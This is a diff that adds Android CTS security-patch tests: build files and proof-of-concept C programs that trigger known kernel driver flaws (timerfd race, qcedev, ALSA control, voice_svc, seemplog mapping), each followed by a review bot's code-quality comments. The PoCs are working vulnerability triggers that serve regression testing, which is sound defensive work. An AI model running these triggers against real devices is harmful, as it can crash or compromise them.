+++ b/hostsidetests/security/securityPatch/Bug-36266767/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-36266767
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-36266767/poc.c b/hostsidetests/security/securityPatch/Bug-36266767/poc.c
new file mode 100644
index 0000000..e534054
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36266767/poc.c
@@ -0,0 +1,72 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/timerfd.h>
+#include <sys/time.h>
+#include <time.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <signal.h>
+
+#define THREAD_NUM 2
+
+pthread_t thread_id[THREAD_NUM+1] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int fd;
+struct itimerspec new_value;
+
+void* child_ioctl_0(void* no_use)
+{
+ int ret = 1;
+
+ while(1){
+ timerfd_settime(fd, 0x3, &new_value, NULL);
+ timerfd_settime(fd, 0x0, &new_value, NULL);
+ }
+}
+
+int main(int argc, char *argv[])
+{
+ int i;
+ new_value.it_value.tv_sec = 0;
+ new_value.it_value.tv_nsec = 0;
+ new_value.it_interval.tv_sec = 0;
+ new_value.it_interval.tv_nsec = 0;
+
+ fd = timerfd_create(CLOCK_REALTIME, 0);
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i = i+1) {
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child_ioctl_0, NULL);
+ }
+
+ while(1) {
+ fd = timerfd_create(CLOCK_REALTIME, 0);
+ usleep(5);
+ close(fd);
+ }
+}
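Review bot: Neither `timerfd_create` call in `main` is checked, and the descriptor created before the thread loop is overwritten by the first iteration of the `while(1)` loop without being closed, so it leaks. The `pthread_create` results are stored in `thread_ret` but never read, and neither loop has an exit condition, so the binary ends only when the harness kills it and never reports a status of its own. Add `if (fd < 0) return EXIT_FAILURE;` after the first create and bound the main loop by an iteration count or time budget. In `child_ioctl_0` the flag literal `0x3` would read better as `TFD_TIMER_ABSTIME | TFD_TIMER_CANCEL_ON_SET`, and the unused `ret` should go.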
diff --git a/hostsidetests/security/securityPatch/Bug-36591162/Android.mk b/hostsidetests/security/securityPatch/Bug-36591162/Android.mk
new file mode 100644
index 0000000..ee17cb7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36591162/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-36591162
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-36591162/poc.c b/hostsidetests/security/securityPatch/Bug-36591162/poc.c
new file mode 100644
index 0000000..33ee5f6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36591162/poc.c
@@ -0,0 +1,89 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <sys/ioctl.h>
+#include <sys/mount.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <pthread.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+enum qcedev_sha_alg_enum {
+ QCEDEV_ALG_SHA1 = 0,
+ QCEDEV_ALG_SHA256 = 1,
+ QCEDEV_ALG_SHA1_HMAC = 2,
+ QCEDEV_ALG_SHA256_HMAC = 3,
+ QCEDEV_ALG_AES_CMAC = 4,
+ QCEDEV_ALG_SHA_ALG_LAST
+};
+
+struct buf_info {
+ union {
+ uint32_t offset;
+ uint8_t *vaddr;
+ };
+ uint32_t len;
+};
+
+struct qcedev_sha_op_req {
+ struct buf_info data[16];
+ uint32_t entries;
+ uint32_t data_len;
+ uint8_t digest[32];
+ uint32_t diglen;
+ uint8_t *authkey;
+ uint32_t authklen;
+ enum qcedev_sha_alg_enum alg;
+};
+
+#define QCEDEV_IOC_MAGIC 0x87
+
+#define QCEDEV_IOCTL_SHA_INIT_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 3, struct qcedev_sha_op_req)
+#define QCEDEV_IOCTL_SHA_UPDATE_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 4, struct qcedev_sha_op_req)
+#define QCEDEV_IOCTL_SHA_FINAL_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 5, struct qcedev_sha_op_req)
+
+void main() {
+ int f = open("/dev/qce", 0);
+
+ struct qcedev_sha_op_req arg;
+ memset(&arg, 0, sizeof(arg));
+ arg.alg = QCEDEV_ALG_AES_CMAC;
+ arg.entries = 1;
+ arg.authklen = 16;
+ char *key = malloc(arg.authklen);
+ arg.authkey = key;
+ arg.data_len = 256;
+
+ arg.data[0].len = arg.data_len;
+ char *data = malloc(arg.data_len);
+ arg.data[0].vaddr = data;
+ int r = ioctl(f, QCEDEV_IOCTL_SHA_INIT_REQ, &arg);
+
+ arg.diglen = 0x8000;
+ r = ioctl(f, QCEDEV_IOCTL_SHA_UPDATE_REQ, &arg);
+ r = ioctl(f, QCEDEV_IOCTL_SHA_FINAL_REQ, &arg);
+}
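Review bot: `main` is declared `void main()` and checks neither `open` nor the two `malloc` calls, so on a device without `/dev/qce` the three ioctls run against fd -1 and the exit status is unspecified. The harness then cannot tell an absent driver from a patched one. Use `int main(void)` with `if (f < 0) return EXIT_FAILURE;` and an explicit `return EXIT_SUCCESS;` at the end. The `key` and `data` buffers are handed to the driver uninitialised and as `char *` where the struct fields are `uint8_t *`; `calloc` into `uint8_t *` locals makes the input deterministic and removes the pointer-sign mismatch. `r` is assigned three times and never read, so either test it or drop it.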
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10231/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-10231/Android.mk
new file mode 100644
index 0000000..3ba801e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10231/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-10231
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10231/poc.c b/hostsidetests/security/securityPatch/CVE-2016-10231/poc.c
new file mode 100644
index 0000000..b6b82d7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10231/poc.c
@@ -0,0 +1,86 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <string.h>
+#include <stdlib.h>
+
+#define SNDRV_CTL_IOCTL_ELEM_WRITE _IOWR('U', 0x13, struct snd_ctl_elem_value)
+
+typedef int __bitwise snd_ctl_elem_iface_t;
+
+struct snd_aes_iec958 {
+ unsigned char status[24];
+ unsigned char subcode[147];
+ unsigned char pad;
+ unsigned char dig_subframe[4];
+};
+
+struct snd_ctl_elem_id {
+ unsigned int numid;
+ snd_ctl_elem_iface_t iface;
+ unsigned int device;
+ unsigned int subdevice;
+ unsigned char name[44];
+ unsigned int index;
+};
+
+struct snd_ctl_elem_value {
+ struct snd_ctl_elem_id id;
+ unsigned int indirect: 1;
+ union {
+ union {
+ long value[128];
+ long *value_ptr;
+ } integer;
+ union {
+ long long value[64];
+ long long *value_ptr;
+ } integer64;
+ union {
+ unsigned int item[128];
+ unsigned int *item_ptr;
+ } enumerated;
+ union {
+ unsigned char data[512];
+ unsigned char *data_ptr;
+ } bytes;
+ struct snd_aes_iec958 iec958;
+ } value;
+ struct timespec tstamp;
+ unsigned char reserved[128-sizeof(struct timespec)];
+};
+
+int main()
+{
+ struct snd_ctl_elem_value val;
+ memset(&val, 0xff, sizeof(val));
+ val.id.numid = 0x80;
+ val.id.iface = 0x1;
+ val.id.device = 0x400;
+ val.id.subdevice = 0x7;
+ memcpy(val.id.name, "\x1d\xfe\xcb\x4c\x1f\x74\x53\xcb\x34\x3c\xcc\x05\xa4\x8e\x24\x98\x87\xe5\xc5\x58\xaf\xb1\x82\x96\x43\x67\x54\xd8\x6d\x5e\x3b\x05\x95\xbe\xfb\xe7\x2e\x7d\x08\xf8\xd6\x7e\xaa\x54", 44);
+ val.id.index = 4;
+ val.value.integer.value[0] = 0x30;
+ int fd = open("/dev/snd/controlC0", O_RDWR);
+ ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &val);
+ return 0;
+}
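Review bot: The descriptor from `open("/dev/snd/controlC0", O_RDWR)` is passed to `ioctl` without a check and never closed, and the ioctl result is discarded, so `main` returns 0 whether or not the request reached the driver. Add `if (fd < 0) return EXIT_FAILURE;` before the ioctl and `close(fd);` after it. The file also re-declares `struct snd_ctl_elem_value` and its members by hand; if the kernel uapi header (`<sound/asound.h>`) is available to this build, including it would keep the ioctl size encoded by `_IOWR` in step with the kernel's layout. `struct timespec` is used without `<time.h>` and presumably arrives through another header, so including it explicitly is safer.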
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0451/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0451/Android.mk
new file mode 100644
index 0000000..6e52fa7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0451/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0451
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact \
+
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
+
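Review bot: The comment line `# Tag this module as a cts test artifact \` ends in a backslash, which in make continues the comment onto the following line. That line is blank here, so nothing is lost today, but removing the blank line would silently turn `LOCAL_COMPATIBILITY_SUITE := cts` into comment text and the module would stop being tagged for CTS. Drop the trailing backslash and the extra blank line so the hunk matches the other Android.mk files in this commit.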
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0451/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0451/poc.c
new file mode 100644
index 0000000..88b7378
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0451/poc.c
@@ -0,0 +1,71 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+#include <errno.h>
+
+#define MSG_REQUEST 0x2
+
+struct voice_svc_write_msg {
+ __u32 msg_type;
+ __u8 payload[0];
+};
+
+int main() {
+ int g_fd = 0;
+ char* dev_path = "/dev/voice_svc";
+
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ return -1;
+ }
+
+ int size = sizeof(struct voice_svc_write_msg) + 4;
+ char* msg = (char*)malloc(size);
+
+ (msg + 4)[0] = 'A';
+ (msg + 4)[1] = 'A';
+ (msg + 4)[2] = 'A';
+ (msg + 4)[3] = 'A';
+ ((struct voice_svc_write_msg*)msg)->msg_type = MSG_REQUEST;
+
+ int i;
+ for (i = 0; i < 20; ++i) {
+ write(g_fd, msg, size);
+ sleep(1);
+ }
+
+ return 0;
+}
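Review bot: `msg` is dereferenced immediately after `malloc(size)` with no NULL check, and neither `msg` nor `g_fd` is released before `return 0`. The result of `write` is ignored on all 20 iterations, so the exit code says nothing about whether the driver accepted the message. Add `if (msg == NULL) { close(g_fd); return -1; }` after the allocation and `free(msg); close(g_fd);` before the final return. Writing the payload through the struct (`((struct voice_svc_write_msg *)msg)->payload[0] = 'A';`) would be clearer than the `(msg + 4)[n]` offsets. The include list repeats `<string.h>` and `<unistd.h>` and pulls in several headers the file does not use, such as `<dlfcn.h>`, `<dirent.h>`, `<pthread.h>` and `<sched.h>`.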
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0462/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0462/Android.mk
new file mode 100644
index 0000000..46c773d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0462/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0462
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0462/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0462/poc.c
new file mode 100644
index 0000000..5cf6a49
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0462/poc.c
@@ -0,0 +1,214 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define DEVICE "/dev/seemplog"
+#define SZ_1M 0x100000
+#define FOUR_MB (4 * SZ_1M)
+
+#define BLK_SIZE 256
+#define BLK_HDR_SIZE 64
+#define TS_SIZE 20
+#define BLK_MAX_MSG_SZ (BLK_SIZE - BLK_HDR_SIZE)
+
+#define TASK_COMM_LEN 16
+
+#define MAGIC 'z'
+
+#define SEEMP_CMD_RESERVE_RDBLKS _IOR(MAGIC, 1, int)
+#define SEEMP_CMD_RELEASE_RDBLKS _IO(MAGIC, 2)
+#define SEEMP_CMD_GET_RINGSZ _IOR(MAGIC, 3, int)
+#define SEEMP_CMD_GET_BLKSZ _IOR(MAGIC, 4, int)
+#define SEEMP_CMD_SET_MASK _IO(MAGIC, 5)
+#define SEEMP_CMD_SET_MAPPING _IO(MAGIC, 6)
+#define SEEMP_CMD_CHECK_FILTER _IOR(MAGIC, 7, int)
+#define SEEMP_CMD_DEBUG_START _IOR(MAGIC, 8, int)
+#define SEEMP_CMD_DEBUG_STOP _IOR(MAGIC, 9, int)
+
+struct read_range {
+ int start_idx;
+ int num;
+};
+
+struct blk_payload {
+ uint32_t api_id;
+ char msg[BLK_MAX_MSG_SZ];
+} __attribute__((packed));
+
+struct seemp_logk_blk {
+ uint8_t status;
+ uint16_t len;
+ uint8_t version;
+ int32_t pid;
+ int32_t uid;
+ int32_t tid;
+ int32_t sec;
+ int32_t nsec;
+ char ts[TS_SIZE];
+ char appname[TASK_COMM_LEN];
+ struct blk_payload payload;
+} __attribute__((packed));
+
+void dump_blk_headers(char *ptr) {
+ int i;
+ struct seemp_logk_blk *temp;
+
+ for (i = 0; i < (FOUR_MB / 256); i++) {
+ temp = (struct seemp_logk_blk *)ptr;
+
+ ptr += 256;
+ }
+}
+
+void print_maps(int time) {
+ char cmd[] = "/proc/%d/maps";
+ char cmd2[sizeof("/proc/-2147483648/maps")];
+ FILE *fp;
+ size_t nread;
+ char buf[1024];
+
+ snprintf(cmd2, sizeof(cmd2)-1, cmd, getpid());
+
+ fp = fopen(cmd2, "r");
+ if (fp == NULL) {
+ exit(-1);
+ }
+
+ while ((nread = fread(buf, 1, sizeof(buf), fp)) > 0)
+ fwrite(buf, 1, nread, stdout);
+
+ fclose(fp);
+ sleep(time);
+}
+
+void reserve_rdblks(int fd) {
+ struct read_range rrange;
+ ioctl(fd, SEEMP_CMD_RESERVE_RDBLKS, &rrange);
+}
+
+unsigned int get_ringsz(int fd) {
+ unsigned int ringsz;
+ ioctl(fd, SEEMP_CMD_GET_RINGSZ, &ringsz);
+ return ringsz;
+}
+
+unsigned int get_blksz(int fd) {
+ unsigned int blksz;
+ ioctl(fd, SEEMP_CMD_GET_BLKSZ, &blksz);
+ return blksz;
+}
+
+void write_to_file(char *ptr) {
+ FILE *dumpfp = fopen("/data/local/tmp/dump", "wb");
+ int i;
+
+ if (dumpfp == NULL) {
+ exit(-1);
+ }
+
+ fwrite(ptr, 1, FOUR_MB, dumpfp);
+ fclose(dumpfp);
+}
+
+void write_to_dev(int fd) {
+ char ts[] = "IIIIIIIIIIIIIIIIIIII";
+ char appname[] = "JJJJJJJJJJJJJJJJ";
+ char msg[] = "LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL";
+
+ struct seemp_logk_blk block;
+
+ block.status = 0xff;
+ block.len = 0x4242;
+ block.version = 'C';
+ block.pid = 0x44444444;
+ block.uid = 0x45454545;
+ block.tid = 0x46464646;
+ block.sec = 0x47474747;
+ block.nsec = 0x48484848;
+ strcpy(block.ts, ts);
+ strcpy(block.appname, appname);
+ block.payload.api_id = 0x51515151;
+ strcpy(block.payload.msg, msg);
+}
+
+void do_mapping(void **ptr, int fd) {
+ *ptr = mmap(NULL,
+ FOUR_MB,
+ 0x7,
+ MAP_SHARED,
+ fd,
+ 0);
+ if (*ptr == MAP_FAILED) {
+ close(fd);
+ exit(-1);
+ }
+}
+
+void spam_mapped_region(char *ptr, int offset, int size) {
+ int i;
+ for (i = offset; i < size; i++)
+ *(ptr + i) = 'A';
+}
+
+void start_printk(int fd) {
+ ioctl(fd, SEEMP_CMD_DEBUG_START, NULL);
+}
+
+void stop_printk(int fd) {
+ ioctl(fd, SEEMP_CMD_DEBUG_STOP, NULL);
+}
+
+int main() {
+ int fd;
+ void *ptr;
+ int i;
+
+ fd = open(DEVICE, O_RDWR);
+ if (fd == -1) {
+ exit(-1);
+ }
+
+ start_printk(fd);
+
+ do_mapping(&ptr, fd);
+
+ for (i = 0; i < (FOUR_MB / 256); i++)
+ write_to_dev(fd);
+
+ dump_blk_headers(ptr);
+ print_maps(5);
+
+ write_to_file(ptr);
+
+ stop_printk(fd);
+
+ close(fd);
+ munmap(ptr, FOUR_MB);
+
+ return 0;
+}
+
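Review bot: In `write_to_dev` the three `strcpy` calls overflow their destinations by one byte each. `ts` holds 20 characters plus the terminator and is copied into `char ts[TS_SIZE]` with `TS_SIZE` 20, `appname` holds 16 plus the terminator for a 16-byte field, and `msg` looks sized to fill `payload.msg` exactly, so its terminator would land past the end of the packed struct on the stack. A fixed-size copy such as `memcpy(block.ts, ts, sizeof(block.ts));` for each field avoids this; with `_FORTIFY_SOURCE` actually enabled the current code would likely abort. The function also never passes `block` to `fd`, and `dump_blk_headers` only walks a pointer, so both are dead code as written and the `main` loop that calls `write_to_dev` has no effect on the device. `write_to_file` leaves a 4 MB `/data/local/tmp/dump` behind that the test should remove. The `mmap` protection `0x7` is clearer as `PROT_READ | PROT_WRITE | PROT_EXEC`.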
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0564/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0564/Android.mk
new file mode 100644
index 0000000..91d154c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0564/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2017-0564
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
